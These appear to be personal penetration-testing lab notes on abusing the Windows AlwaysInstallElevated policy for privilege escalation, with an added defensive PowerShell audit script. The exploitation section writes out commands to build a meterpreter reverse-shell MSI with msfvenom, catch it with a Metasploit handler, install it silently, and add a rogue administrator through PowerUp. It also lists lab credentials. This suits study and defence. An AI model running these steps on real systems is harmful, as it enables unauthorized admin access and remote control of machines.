MSI packages (Windows installers). When the AlwaysInstallElevated policy is set, we can have these packages install elevated (as an admin user).
RDP in as the normal user:
Username: user
password: password321
Check (both hives must show the value set to 1):
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
0x1 means the value is 1, i.e. the policy is enabled (so we can exploit/use it for priv esc)
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
again, 0x1 means enabled
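The two reg query checks above, as an added audit script (not part of the original notes): it reads AlwaysInstallElevated from both hives, treats a missing key as 0, and only flags the host when both values are 1, since the elevated install requires both; the function name Test-AlwaysInstallElevated is my own.

```powershell
# Added example: audit AlwaysInstallElevated in both policy hives.
# Same keys as the reg query commands in the notes; a missing key or value counts as 0.
function Test-AlwaysInstallElevated {
    $keys = @{
        'HKLM' = 'HKLM:\Software\Policies\Microsoft\Windows\Installer'
        'HKCU' = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
    }
    $values = @{}
    foreach ($hive in $keys.Keys) {
        $value = 0
        # -ErrorAction SilentlyContinue returns $null when the key or value does not exist
        $item = Get-ItemProperty -Path $keys[$hive] -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
        if ($null -ne $item) { $value = [int]$item.AlwaysInstallElevated }
        $values[$hive] = $value
    }
    # The weakness only exists when the machine policy AND the user policy are both 1
    [pscustomobject]@{
        HKLM        = $values['HKLM']
        HKCU        = $values['HKCU']
        Exploitable = ($values['HKLM'] -eq 1 -and $values['HKCU'] -eq 1)
    }
}

$finding = Test-AlwaysInstallElevated
$finding | Format-List
if ($finding.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any user can install an MSI with SYSTEM privileges.'
    Write-Host 'Remediation: disable "Always install with elevated privileges" under both Computer Configuration and User Configuration > Administrative Templates > Windows Components > Windows Installer (or set both registry values to 0).'
}
```

Run it as the low-privileged user you RDP'd in as; HKCU is read from that user's hive, which is the one that matters for the check.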
Exploitation:
PowerUp results:
PowerUp lists the AlwaysInstallElevated finding with the AbuseFunction:
Write-UserAddMSI
All you have to do to use that abuse function is scroll to the bottom of these results in the PowerShell window and run:
Write-UserAddMSI
and it will do it for you.
It will create a UserAdd MSI in the current folder. Run it.
It will prompt you for a user to create and which group to put it in. We want group = Administrators.
My user (username / password / group):
340i
BMW
Administrators
Check by running this in CMD:
net localgroup administrators
Kali:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
run
New Terminal:
msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 -f msi -o setup.msi
python3 -m http.server 80
Windows VM:
1. Place 'setup.msi' in 'C:\Temp'.
2. Open a command prompt and type:
msiexec /quiet /qn /i C:\Temp\setup.msi
We get a shell back in the handler:
getuid
Can also (this didn't work for me in my lab):
background
use exploit/windows/local/always_install_elevated
options
set session 1 # or whatever session number the meterpreter shell has